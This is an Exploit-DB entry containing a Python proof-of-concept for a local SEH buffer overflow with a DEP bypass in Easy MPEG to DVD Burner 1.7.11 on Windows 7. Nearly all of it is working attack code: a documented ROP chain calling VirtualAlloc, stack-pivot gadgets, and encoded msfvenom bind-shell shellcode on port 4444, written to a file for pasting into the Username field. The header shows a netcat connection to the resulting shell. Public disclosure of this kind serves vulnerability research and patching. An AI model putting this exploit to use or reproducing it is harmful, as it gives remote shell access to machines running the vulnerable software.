EDB-ID: 44658 | Author: Juan Prescotto | Published: 2018-05-20 | CVE: N/A | Type: Local | Platform: Windows | Vulnerable App: |
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow #
# Date: 2018-05-19 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html #
# Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe #
# Version: 1.7.11 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit #
# Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00\x0a\x0d #
# SEH Offset: 1012 #
# Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# root@kali:~/Desktop# nc -nv 10.0.1.14 4444 #
# (UNKNOWN) [10.0.1.14] 4444 (?) open #
# Microsoft Windows [Version 6.1.7601] #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
# #
# C:\Program Files (x86)\Easy MPEG to DVD Burner> #
#------------------------------------------------------------------------------------------------------------------------------------#
# My register setup when VirtualAlloc() is called (Defeat DEP) :
#--------------------------------------------
# EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
# ECX = flProtect (0x40)
# EDX = flAllocationType (0x1000)
# EBX = dwSize (0x01)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
# ESI = ptr to VirtualAlloc()
# EDI = ROP NOP (RETN)
import struct
def create_rop_chain():
rop_gadgets = [
#***START VirtualAlloc() to ESI***
0x10027e6b, # POP EAX # RETN [SkinMagic.dll] **
0x1003b1d4, # ptr to &VirtualAlloc() [IAT SkinMagic.dll]
0x100369a1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll]
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xffffffff, #
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
0x10037bc0, # POP EDX # RETN [SkinMagic.dll]
0xffffffff, #
0x10035a07, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
0x10037654, # POP EAX # RETN [SkinMagic.dll]
0xa141dffb, #
0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x41414141, # FILLER
0x1003993e, # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
#***END VirtualAlloc() to ESI***
#***START 0x40 to ECX***
0x100185fb, # XOR EAX,EAX # RETN [SkinMagic.dll]
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x10037c5b, # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
0x41414141, # FILLER
0x10032176, # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
#***END 0x40 to ECX***
#***START 0x1000 to EDX***
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xaaaaaaaa, #
0x10037bc0, # POP EDX # RETN [SkinMagic.dll]
0x55556556, #
0x10037654, # POP EAX # RETN [SkinMagic.dll]
0xa141dffb, #
0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x41414141, # FILLER
#***END 0x1000 to EDX***
#*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
0x1002829d, # POP EBP # RETN [SkinMagic.dll]
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x100284f8, # {pivot 16 / 0x10} : # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
#*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
#***START 0x1 to EBX***
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xffffffff, #
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
#***END 0x1 to EBX***
#***START ROP NOP to EDI***
0x100342f0, # POP EDI # RETN [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
#***END ROP NOP to EDI***
#***START Gadgets to execute PUSHAD / Execute VirtualAlloc()***
0x10037654, # POP EAX # RETN [SkinMagic.dll]
0xa140acd2, # CONSTANT
0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555", # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555, # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
#***END Gadgets to execute PUSHAD***
#***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode***
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x1001cc57, # & push esp # ret [SkinMagic.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
nop_rop_chain_1 = "\xbd\xdd\x02\x10" * 18 # 0x1002ddbd : {pivot 12 / 0x0c} : # ADD ESP,0C # RETN [SkinMagic.dll]
nop_rop_chain_2 = "\x58\x21\x03\x10" * 22 # RETN (ROP NOP) [SkinMagic.dll]
seh = "\x06\x4e\x40" # 0x00404e06 : {stack pivot 1928 / 0x788} (Lands us into rop nop chain --> rop_chain) : # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
nop = "\x90" * 20
#Max Space Avaliable for Shellcode = 600 bytes
#------------------------------------------------------------------------------------#
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
# x86/shikata_ga_nai succeeded with size 355 (iteration=0) #
#------------------------------------------------------------------------------------#
shellcode = ""
shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"
exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh
f = open ("Exploit.txt", "w")
f.write(exploit)
f.close()